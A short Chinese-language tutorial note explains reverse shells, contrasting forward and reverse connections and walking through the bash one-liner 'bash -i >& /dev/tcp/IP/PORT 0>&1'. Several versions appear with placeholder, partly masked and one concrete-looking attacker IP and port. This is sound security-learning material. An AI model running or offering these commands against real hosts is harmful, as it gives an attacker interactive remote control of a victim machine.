反弹Shell
反弹Shell,就是将目标机的命令行输入与输出重定向到攻击者的主机上。
正向连接
顾名思义,就是我们主动去连接目标主机,比如一些远程桌面服务、Web服务、SSH、Telnet等都是正向连接
反向连接
反向连接一般用于目标受到了防火墙的限制,目标主机只能发送请求,无法接受请求。这种情况就需要去进行反向连接。
反弹命令
bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/2333 0>&1或bash -c "bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1"# bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1
bash -i 这里的bash意思是启动bash shell的命令 -i表示是启动交互式shell。交互式shell表示用于用户直接与其进行交互,接受用户输入的命令并执行
>& /dev/tcp/xxx.xxx.xxx.xxx/2333 将标准输出和错误重定向通过TCP协议连接到IP地址为xxx.xxx.xxx.xxx的2333端口上。其中 /dev/tcp 是bash的一个特性,允许通过网络进行通信。
0>&1 这里的意思是将标准输入重定向到目标主机。
bash -c "bash -i >&/dev/tcp/39.100.89.198/9527 0>&1"